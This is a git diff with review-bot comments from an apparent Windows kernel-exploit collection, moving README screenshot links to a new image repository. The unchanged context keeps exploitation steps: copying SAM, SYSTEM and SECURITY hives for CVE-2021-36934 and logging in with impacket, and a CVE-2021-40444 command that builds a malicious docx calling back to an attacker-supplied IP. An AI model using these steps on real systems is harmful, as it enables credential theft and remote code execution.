-![CVE-2021-26868&CVE-2021-33739_win10_1909_x64](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-26868&CVE-2021-33739_win10_1909_x64.gif) +![CVE-2021-26868&CVE-2021-33739_win10_1909_x64](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-26868&CVE-2021-33739_win10_1909_x64.gif) #### 代码来源 diff --git a/CVE-2021-33739/README_EN.md b/CVE-2021-33739/README_EN.md index 495d5b8..18e7d72 100644 --- a/CVE-2021-33739/README_EN.md +++ b/CVE-2021-33739/README_EN.md 
@@ -30,7 +30,7 @@ CompilerEnvironment Test system Windows 10 1909 X64 -![CVE-2021-26868&CVE-2021-33739_win10_1909_x64](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-26868&CVE-2021-33739_win10_1909_x64.gif) +![CVE-2021-26868&CVE-2021-33739_win10_1909_x64](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-26868&CVE-2021-33739_win10_1909_x64.gif) #### ProjectSource diff --git a/CVE-2021-36934/README.md b/CVE-2021-36934/README.md index d785084..bd95d70 100644 --- a/CVE-2021-36934/README.md +++ b/CVE-2021-36934/README.md @@ -37,19 +37,19 @@ icacls C:\windows\system32\config\sam 当出现如下图所示就表明是易受攻击的机器 -![image-20210905164036648](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_1.png) +![image-20210905164036648](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_1.png) 然后需要开启系统还原,右键“此电脑->属性”,点击“系统保护->配置->启用系统保护->应用->确定” -![image-20210905164831213](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_2.png) +![image-20210905164831213](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_2.png) 然后创建系统还原点 -![image-20210905164912574](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_3.png) +![image-20210905164912574](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_3.png) 接着使用EXP即可获取到系统的SAM,SYSTEM和SECURITY文件 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_4.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_4.gif) 最后使用impacket项目进行登录即可 diff --git a/CVE-2021-36934/README_EN.md b/CVE-2021-36934/README_EN.md index 0fbe460..a0c03e5 100644 --- a/CVE-2021-36934/README_EN.md +++ b/CVE-2021-36934/README_EN.md 
@@ -37,19 +37,19 @@ icacls C:\windows\system32\config\sam When the following figure shows the machine, it is an easy attack. -![image-20210905164036648](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_1.png) +![image-20210905164036648](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_1.png) Then you need to turn on the system restore, right key "This computer-> property", click "System Protection -> Configuration -> Enable System Protection -> Apply -> OK" -![image-20210905164831213](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_2.png) +![image-20210905164831213](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_2.png) Then create a system restore point -![image-20210905164912574](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_3.png) +![image-20210905164912574](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_3.png) Then you can get the system's SAM and SYSTEM and SECURITY files using Exp. -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_4.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_4.gif) Finally, use the IMPACKET project to log in. diff --git a/CVE-2021-40444/README.md b/CVE-2021-40444/README.md index d042077..0e5aff9 100644 --- a/CVE-2021-40444/README.md +++ b/CVE-2021-40444/README.md 
@@ -42,7 +42,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4044 可以知道,其实就是利用默认浏览器(IE)加载ActiveX -![image-20210911112944428](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_1.png) +![image-20210911112944428](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_1.png) 本质上恶意利用只需要修改样本中的`document.xml.rels`文件中框起来mhtml和x-usc这两段内容该为恶意目标网页,即可达到利用 @@ -109,7 +109,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4044 cd CVE-2021-40444 ; python3 exploit.py generate test/calc.dll http://you_ip ``` -![image-20210911115757383](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_2.png) +![image-20210911115757383](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_2.png) 然后启动http服务 @@ -119,7 +119,7 @@ cd srv ; python3 -m http.server 80 接着把生成的恶意docx文件(在`out/`文件夹中),放到目标机器上(Windows 10 2004 x64),即可执行成功 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_3.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_3.gif) #### 参考项目 diff --git a/CVE-2021-40444/README_EN.md b/CVE-2021-40444/README_EN.md index eca0ee5..9d168fc 100644 --- a/CVE-2021-40444/README_EN.md +++ b/CVE-2021-40444/README_EN.md 
@@ -42,7 +42,7 @@ Based on the previous use of samples`938545f7bbe40738908a95da8cdeabb2a11ce2ca36b You can know that it is to load ActiveX using the default browser (IE) -![image-20210911112944428](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_1.png) +![image-20210911112944428](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_1.png) Essentially maliciously uses only the `Document.xml.Rels` files in the sample, MHTML and X-USC, which can be used as the malicious target web page, you can achieve the utilization @@ -109,7 +109,7 @@ Then use a one-touch script,`test/calc.dll`This is the absolute path you generat cd CVE-2021-40444 ; python3 exploit.py generate test/calc.dll http://you_ip ``` -![image-20210911115757383](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_2.png) +![image-20210911115757383](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_2.png) Then start the HTTP service @@ -119,7 +119,7 @@ cd srv ; python3 -m http.server 80 The resulting malicious DOCX file (in the `out/` folder) is placed on the target machine (Windows 10 2004 x64), can perform success -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_3.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_3.gif) #### ProjectSource diff --git a/CVE-2021-40449/README.md b/CVE-2021-40449/README.md index 2a23966..c8089e1 100644 --- a/CVE-2021-40449/README.md +++ b/CVE-2021-40449/README.md 
@@ -46,7 +46,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4044 测试系统Windows 10 1607 X64(演示使用的是CVE-2021-40449_1607_x64文件中的代码进行编译 -![image-20210911115757383](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40449_Windows_10_1607_X64.gif) +![image-20210911115757383](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-40449_Windows_10_1607_X64.gif) #### 参考项目 diff --git a/CVE-2021-40449/README_EN.md b/CVE-2021-40449/README_EN.md index d80c238..356ee93 100644 --- a/CVE-2021-40449/README_EN.md +++ b/CVE-2021-40449/README_EN.md @@ -46,7 +46,7 @@ CompilerEnvironment Test System Windows 10 1607 X64 (Demo is compiled with code in CVE-2021-40449_1607_X64 file -![image-20210911115757383](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40449_Windows_10_1607_X64.gif) +![image-20210911115757383](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-40449_Windows_10_1607_X64.gif) #### ProjectSource diff --git a/TestFailure/CVE-2015-0062/README.md b/TestFailure/CVE-2015-0062/README.md index fece2cf..8de0588 100644 --- a/TestFailure/CVE-2015-0062/README.md +++ b/TestFailure/CVE-2015-0062/README.md @@ -26,8 +26,8 @@ 不过很幸运,iis/sqlserver的虚拟帐户、默认的network service和local service都具有这个特权,所以在shell上或sa上用着和其他exp没什么区别。 对于win7/win8/win8.1等系统同样有效,前提是要先找到一个安装在上述系统上的sa/iis等包含特权的服务账户并执行exp。 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-0062_win2008.png) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-0062_win2008.png) -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-0062_win2012.png) \ No newline at end of file +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-0062_win2012.png) \ No newline at end of file
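Review bot: Every hunk in this patch is the same mechanical substitution of `Random-img` by `Image` in the image path, so the thing to verify is completeness rather than any single line: please confirm with `grep -rn "Random-img" .` over the whole checkout (including any README not touched by this patch) that no reference to the old repository remains, since one missed line becomes a broken image as soon as the old repository disappears.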
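Review bot: The added lines in every hunk keep the `raw.github.com` host and the mutable `master` ref, e.g. `https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1015_win10_1909_x64_poc.gif`; since each image line is being rewritten anyway, this is the moment to move to `raw.githubusercontent.com`, the host GitHub serves raw content from, rather than relying on the legacy redirect, and to consider pinning a commit SHA instead of `master` so that the documented screenshots cannot silently change under a README that describes a specific test run.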
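Review bot: In the CVE-2020-1313 and CVE-2020-1337 hunks (README.md and README_EN.md alike) the new path carries over the `windos_10_1909` misspelling from the old filename, as in `CVE-2020-1313_windos_10_1909_x64.gif` and `CVE-2020-1337_windos_10_1909_x64.gif`. If the files were re-uploaded to the `Image` repository, rename them to `windows_10_1909` as part of the migration; if they were copied unchanged, the path is correct as written and the commit message should say so, so that nobody later "fixes" the link and breaks it.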
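Review bot: The CVE-2020-1015 hunks add an image with an empty alt text (`![](...)`), and the CVE-2021-40449 hunks reuse the alt text `image-20210911115757383`, which is the same string the CVE-2021-40444 hunks use for a different file; since these lines are being rewritten, give each image an alt that names what it shows, for example `![CVE-2021-40449 PoC on Windows 10 1607 x64](...)`, so the README still conveys the test result when the image host is unreachable.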
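Review bot: The `TestFailure/CVE-2015-0062/README.md` hunk still ends with `\ No newline at end of file` on both the removed and the added side; since the final line is being rewritten anyway, add the trailing newline so the file ends cleanly and future diffs of this README stop carrying the marker.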